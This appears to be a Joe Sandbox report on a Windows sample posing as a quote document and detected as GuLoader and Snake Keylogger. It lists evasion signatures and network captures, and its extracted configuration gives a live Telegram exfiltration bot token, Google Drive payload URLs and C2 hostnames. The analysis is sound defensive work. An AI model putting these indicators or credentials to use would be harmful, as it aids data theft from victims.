Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Quote and Collaboration Docs.exe

Overview

General Information

Sample name:Request for Quote and Collaboration Docs.exe
Analysis ID:1567432
MD5:1e5fbbef8f5ad057fc7b2210a2070e9b
SHA1:f9246fe78392d446a5082f30e18e41aa5f63d825
SHA256:405f0a54d76a3931ab40dd79b1119f906eb29ba1b09d5ddf64091136ca3e0344
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s", "Chat_id": "2065242915", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.2239950600.00000000079ED000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T15:24:05.561688+010028033053Unknown Traffic192.168.2.949959172.67.177.134443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T15:24:00.829294+010028032742Potentially Bad Traffic192.168.2.949945132.226.247.7380TCP
      2024-12-03T15:24:03.735614+010028032742Potentially Bad Traffic192.168.2.949945132.226.247.7380TCP
      2024-12-03T15:24:07.095085+010028032742Potentially Bad Traffic192.168.2.949963132.226.247.7380TCP
      2024-12-03T15:24:10.364462+010028032742Potentially Bad Traffic192.168.2.949972132.226.247.7380TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T15:23:52.321949+010028032702Potentially Bad Traffic192.168.2.949923172.217.19.174443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Request for Quote and Collaboration Docs.exeAvira: detected
      Source: 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s", "Chat_id": "2065242915", "Version": "4.4"}
      Source: Request for Quote and Collaboration Docs.exeReversingLabs: Detection: 13%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

      Location Tracking

      barindex
      Source: unknownDNS query: name: reallyfreegeoip.org
      Source: Request for Quote and Collaboration Docs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49953 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49923 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.9:49932 version: TLS 1.2
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00402770 FindFirstFileW,5_2_00402770
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405772
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_0040622D FindFirstFileW,FindClose,5_2_0040622D
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
      Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownDNS query: name: checkip.dyndns.org
      Source: unknownDNS query: name: reallyfreegeoip.org
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49945 -> 132.226.247.73:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49972 -> 132.226.247.73:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49963 -> 132.226.247.73:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49923 -> 172.217.19.174:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49959 -> 172.67.177.134:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49953 version: TLS 1.0
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037849000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2627133012.0000000039FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
      Source: Request for Quote and Collaboration Docs.exe, 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Request for Quote and Collaboration Docs.exe, 00000000.00000000.1342462043.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000000.2235036869.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037822000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2606364863.0000000008B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000003.2437297112.0000000006EA0000.00000004.00000020.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80&export=download
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000003.2437297112.0000000006EA0000.00000004.00000020.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80&export=downloadps
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000003.2437297112.0000000006EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80&export=downloadtH
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000003.2437297112.0000000006EA0000.00000004.00000020.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/g
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037849000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228$
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49923 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.9:49932 version: TLS 1.2
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D3
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_0040335A
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_00404B100_2_00404B10
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_0040653F0_2_0040653F
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00404B105_2_00404B10
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_0040653F5_2_0040653F
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_0015C19B5_2_0015C19B
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_001569A05_2_001569A0
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_001529E05_2_001529E0
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_0015CA085_2_0015CA08
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_001553625_2_00155362
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_0015C4685_2_0015C468
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00159DE05_2_00159DE0
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_0015C7385_2_0015C738
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00156FC85_2_00156FC8
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00153E095_2_00153E09
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: String function: 00402B3A appears 47 times
      Source: Request for Quote and Collaboration Docs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.evad.winEXE@3/8@4/4
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045CA
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeFile created: C:\Users\user\selvsikkerJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeMutant created: NULL
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeFile created: C:\Users\user\AppData\Local\Temp\nslF4E1.tmpJump to behavior
      Source: Request for Quote and Collaboration Docs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Request for Quote and Collaboration Docs.exeReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeFile read: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess created: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess created: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: windows.storage.dllJump to behavior
